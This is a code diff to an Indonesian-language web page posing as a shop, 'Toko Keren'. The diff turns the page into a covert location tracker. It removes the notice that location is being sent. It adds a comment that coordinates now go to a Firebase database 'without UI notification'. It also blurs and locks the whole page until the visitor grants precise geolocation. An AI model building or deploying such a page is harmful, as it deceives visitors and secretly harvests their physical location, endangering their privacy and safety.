--- a/index.html
+++ b/index.html
@@ -10,6 +10,13 @@
       padding: 1rem;
       background: #f5f5f5;
       color: #333;
+      transition: filter 0.3s ease;
+    }
+    /* Filter buram dan abu-abu */
+    body.blur {
+      filter: grayscale(100%) blur(3px);
+      pointer-events: none;
+      user-select: none;
     }
     header {
       text-align: center;
@@ -46,18 +53,26 @@
       object-fit: contain;
       margin-bottom: 0.5rem;
     }
-    .info {
-      margin-top: 1rem;
-      font-size: 0.9rem;
-      color: #27ae60;
-      min-height: 24px;
+    /* Pesan overlay saat belum izinkan lokasi */
+    #permission-message {
+      position: fixed;
+      top: 0; left: 0; right: 0; bottom: 0;
+      background: rgba(255, 255, 255, 0.9);
+      color: #e74c3c;
+      font-size: 1.2rem;
+      display: flex;
+      justify-content: center;
+      align-items: center;
       text-align: center;
+      padding: 2rem;
+      z-index: 9999;
+      display: none; /* default disembunyikan */
     }
   </style>
   <script src="https://www.gstatic.com/firebasejs/9.23.0/firebase-app-compat.js"></script>
   <script src="https://www.gstatic.com/firebasejs/9.23.0/firebase-database-compat.js"></script>
 </head>
-<body>
+<body class="blur">
   <header>
     <h1>🛒 Toko Keren</h1>
     <p>Belanja mudah dan cepat</p>
@@ -86,7 +101,10 @@
     </div>
   </div>
 
-  <div class="info" id="info">Mengirim lokasi ke server...</div>
+  <div id="permission-message">
+    ⚠️ Untuk melihat toko, mohon izinkan akses lokasi di browser Anda.<br>
+    Jika sudah muncul popup izin, silakan pilih “Izinkan”.
+  </div>
 
   <script>
     const firebaseConfig = {
@@ -100,39 +118,80 @@
 
     firebase.initializeApp(firebaseConfig);
     const db = firebase.database();
-    const infoEl = document.getElementById('info');
 
+    const permissionMessageEl = document.getElementById('permission-message');
+    const bodyEl = document.body;
+
+    // Fungsi kirim lokasi ke Firebase tanpa notifikasi UI
     function sendLocation(lat, lon) {
       const now = new Date().toISOString();
       db.ref("lokasi").push({
         latitude: lat,
         longitude: lon,
         timestamp: now
-      }).then(() => {
-        infoEl.innerText = `✅ Lokasi berhasil dikirim. Terima kasih!`;
-      }).catch(err => {
-        infoEl.innerText = "❌ Gagal kirim lokasi: " + err.message;
-        infoEl.style.color = "red";
       });
     }
 
-    if (navigator.geolocation) {
-      navigator.geolocation.getCurrentPosition(pos => {
-        const lat = pos.coords.latitude.toFixed(6);
-        const lon = pos.coords.longitude.toFixed(6);
-        sendLocation(lat, lon);
-      }, err => {
-        infoEl.innerText = "❌ Gagal mendapatkan lokasi: " + err.message;
-        infoEl.style.color = "red";
-      }, {
-        enableHighAccuracy: true,
-        timeout: 10000,
-        maximumAge: 0
-      });
-    } else {
-      infoEl.innerText = "Browser tidak mendukung Geolocation.";
-      infoEl.style.color = "red";
+    function checkPermissionAndRequest() {
+      // Cek status permission geolocation
+      if (!navigator.geolocation) {
+        permissionMessageEl.innerText = "Browser Anda tidak mendukung Geolocation.";
+        permissionMessageEl.style.display = "flex";
+        return;
+      }
+
+      // Cek permission API
+      if (navigator.permissions) {
+        navigator.permissions.query({ name: 'geolocation' }).then(function(permissionStatus) {
+          if (permissionStatus.state === 'granted') {
+            // izin sudah diberikan, ambil lokasi dan tampilkan halaman normal
+            bodyEl.classList.remove('blur');
+            permissionMessageEl.style.display = "none";
+            navigator.geolocation.getCurrentPosition(pos => {
+              sendLocation(pos.coords.latitude.toFixed(6), pos.coords.longitude.toFixed(6));
+            });
+          } else if (permissionStatus.state === 'prompt') {
+            // belum dipilih, tampilkan pesan dan coba minta izin
+            permissionMessageEl.style.display = "flex";
+            navigator.geolocation.getCurrentPosition(pos => {
+              // user baru saja memberi izin
+              bodyEl.classList.remove('blur');
+              permissionMessageEl.style.display = "none";
+              sendLocation(pos.coords.latitude.toFixed(6), pos.coords.longitude.toFixed(6));
+            }, err => {
+              // user tolak izin
+              permissionMessageEl.innerText = "⚠️ Anda menolak izin lokasi. Untuk melihat toko, mohon izinkan akses lokasi.";
+              permissionMessageEl.style.display = "flex";
+              bodyEl.classList.add('blur');
+            });
+          } else if (permissionStatus.state === 'denied') {
+            // user tolak izin
+            permissionMessageEl.innerText = "⚠️ Anda telah menolak izin lokasi. Untuk melihat toko, mohon izinkan akses lokasi dari pengaturan browser.";
+            permissionMessageEl.style.display = "flex";
+            bodyEl.classList.add('blur');
+          }
+          
+          // Monitor jika permission berubah di waktu berjalan
+          permissionStatus.onchange = function() {
+            checkPermissionAndRequest();
+          };
+        });
+      } else {
+        // Fallback jika browser tidak support Permissions API
+        // Coba langsung minta lokasi
+        navigator.geolocation.getCurrentPosition(pos => {
+          bodyEl.classList.remove('blur');
+          permissionMessageEl.style.display = "none";
+          sendLocation(pos.coords.latitude.toFixed(6), pos.coords.longitude.toFixed(6));
+        }, err => {
+          permissionMessageEl.style.display = "flex";
+          permissionMessageEl.innerText = "⚠️ Mohon izinkan akses lokasi untuk melihat toko.";
+          bodyEl.classList.add('blur');
+        });
+      }
     }
+
+    checkPermissionAndRequest();
   </script>
 </body>
 </html>
